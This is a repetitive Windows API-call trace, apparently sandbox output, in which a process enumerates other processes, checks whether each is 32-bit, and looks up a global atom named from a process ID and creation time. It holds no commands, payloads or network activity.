	[0076.549] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0076.549] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0076.549] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.549] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0076.549] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.550] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0076.550] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0076.550] CloseHandle (hObject=0x224) returned 1
	[0076.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0076.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0076.550] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.550] CloseHandle (hObject=0x224) returned 1
	[0076.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0076.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0076.550] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.550] CloseHandle (hObject=0x224) returned 1
	[0076.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0076.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0076.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0076.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0076.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0076.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0076.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0076.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0076.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0076.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0076.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0076.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0076.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0076.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0076.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0076.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0076.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0076.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0076.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0076.639] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.639] CloseHandle (hObject=0x224) returned 1
	[0076.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0076.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0076.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0076.639] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.639] CloseHandle (hObject=0x224) returned 1
	[0076.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0076.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0076.639] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.639] CloseHandle (hObject=0x224) returned 1
	[0076.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0076.639] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.639] CloseHandle (hObject=0x224) returned 1
	[0076.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0076.640] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.640] CloseHandle (hObject=0x224) returned 1
	[0076.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0076.640] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.640] CloseHandle (hObject=0x224) returned 1
	[0076.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0076.640] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.640] CloseHandle (hObject=0x224) returned 1
	[0076.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0076.640] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.640] CloseHandle (hObject=0x224) returned 1
	[0076.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0076.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0076.640] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.640] CloseHandle (hObject=0x224) returned 1
	[0076.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0076.640] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.640] CloseHandle (hObject=0x224) returned 1
	[0076.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0076.640] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.640] CloseHandle (hObject=0x224) returned 1
	[0076.641] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0076.641] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0076.641] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.641] CloseHandle (hObject=0x224) returned 1
	[0076.641] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0076.641] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.641] CloseHandle (hObject=0x224) returned 1
	[0076.641] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0076.641] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.641] CloseHandle (hObject=0x224) returned 1
	[0076.641] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0076.641] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.641] CloseHandle (hObject=0x224) returned 1
	[0076.641] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0076.641] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.641] CloseHandle (hObject=0x224) returned 1
	[0076.641] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0076.641] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.641] CloseHandle (hObject=0x224) returned 1
	[0076.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0076.642] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.642] CloseHandle (hObject=0x224) returned 1
	[0076.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0076.642] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.642] CloseHandle (hObject=0x224) returned 1
	[0076.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0076.642] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.642] CloseHandle (hObject=0x224) returned 1
	[0076.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0076.642] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.642] CloseHandle (hObject=0x224) returned 1
	[0076.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0076.642] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.642] CloseHandle (hObject=0x224) returned 1
	[0076.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0076.642] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.642] CloseHandle (hObject=0x224) returned 1
	[0076.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0076.642] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.642] CloseHandle (hObject=0x224) returned 1
	[0076.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0076.643] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.643] CloseHandle (hObject=0x224) returned 1
	[0076.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0076.643] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.643] CloseHandle (hObject=0x224) returned 1
	[0076.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0076.643] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.643] CloseHandle (hObject=0x224) returned 1
	[0076.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0076.643] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.643] CloseHandle (hObject=0x224) returned 1
	[0076.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0076.643] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.643] CloseHandle (hObject=0x224) returned 1
	[0076.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0076.643] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.643] CloseHandle (hObject=0x224) returned 1
	[0076.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0076.643] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.643] CloseHandle (hObject=0x224) returned 1
	[0076.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0076.644] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.644] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0076.644] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0076.644] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0076.644] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.644] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0076.645] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.645] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0076.645] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0076.645] CloseHandle (hObject=0x224) returned 1
	[0076.645] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0076.645] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0076.645] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.645] CloseHandle (hObject=0x224) returned 1
	[0076.645] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0076.645] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0076.645] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.645] CloseHandle (hObject=0x224) returned 1
	[0076.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0076.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0076.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0076.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0076.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0076.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0076.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0076.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0076.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0076.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0076.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0076.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0076.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0076.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0076.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0076.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0076.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0076.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0076.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0076.725] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.725] CloseHandle (hObject=0x224) returned 1
	[0076.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0076.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0076.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0076.725] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.725] CloseHandle (hObject=0x224) returned 1
	[0076.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0076.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0076.725] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.725] CloseHandle (hObject=0x224) returned 1
	[0076.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0076.725] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.725] CloseHandle (hObject=0x224) returned 1
	[0076.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0076.725] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.726] CloseHandle (hObject=0x224) returned 1
	[0076.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0076.726] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.726] CloseHandle (hObject=0x224) returned 1
	[0076.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0076.726] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.726] CloseHandle (hObject=0x224) returned 1
	[0076.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0076.726] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.726] CloseHandle (hObject=0x224) returned 1
	[0076.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0076.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0076.726] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.726] CloseHandle (hObject=0x224) returned 1
	[0076.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0076.726] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.726] CloseHandle (hObject=0x224) returned 1
	[0076.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0076.726] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.726] CloseHandle (hObject=0x224) returned 1
	[0076.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0076.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0076.727] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.727] CloseHandle (hObject=0x224) returned 1
	[0076.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0076.727] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.727] CloseHandle (hObject=0x224) returned 1
	[0076.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0076.727] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.727] CloseHandle (hObject=0x224) returned 1
	[0076.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0076.727] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.727] CloseHandle (hObject=0x224) returned 1
	[0076.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0076.727] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.727] CloseHandle (hObject=0x224) returned 1
	[0076.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0076.727] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.727] CloseHandle (hObject=0x224) returned 1
	[0076.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0076.727] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.728] CloseHandle (hObject=0x224) returned 1
	[0076.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0076.728] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.728] CloseHandle (hObject=0x224) returned 1
	[0076.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0076.728] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.728] CloseHandle (hObject=0x224) returned 1
	[0076.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0076.728] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.728] CloseHandle (hObject=0x224) returned 1
	[0076.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0076.728] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.728] CloseHandle (hObject=0x224) returned 1
	[0076.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0076.728] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.728] CloseHandle (hObject=0x224) returned 1
	[0076.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0076.728] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.728] CloseHandle (hObject=0x224) returned 1
	[0076.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0076.728] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.729] CloseHandle (hObject=0x224) returned 1
	[0076.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0076.729] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.729] CloseHandle (hObject=0x224) returned 1
	[0076.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0076.729] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.729] CloseHandle (hObject=0x224) returned 1
	[0076.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0076.729] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.729] CloseHandle (hObject=0x224) returned 1
	[0076.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0076.729] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.729] CloseHandle (hObject=0x224) returned 1
	[0076.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0076.729] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.729] CloseHandle (hObject=0x224) returned 1
	[0076.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0076.729] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.729] CloseHandle (hObject=0x224) returned 1
	[0076.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0076.730] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.730] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0076.730] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0076.730] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0076.730] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.730] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0076.730] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0076.731] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0076.731] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0076.731] CloseHandle (hObject=0x224) returned 1
	[0076.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0076.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0076.731] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.731] CloseHandle (hObject=0x224) returned 1
	[0076.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0076.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0076.731] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0076.731] CloseHandle (hObject=0x224) returned 1
	[0076.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0076.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0076.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0076.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0076.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0076.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
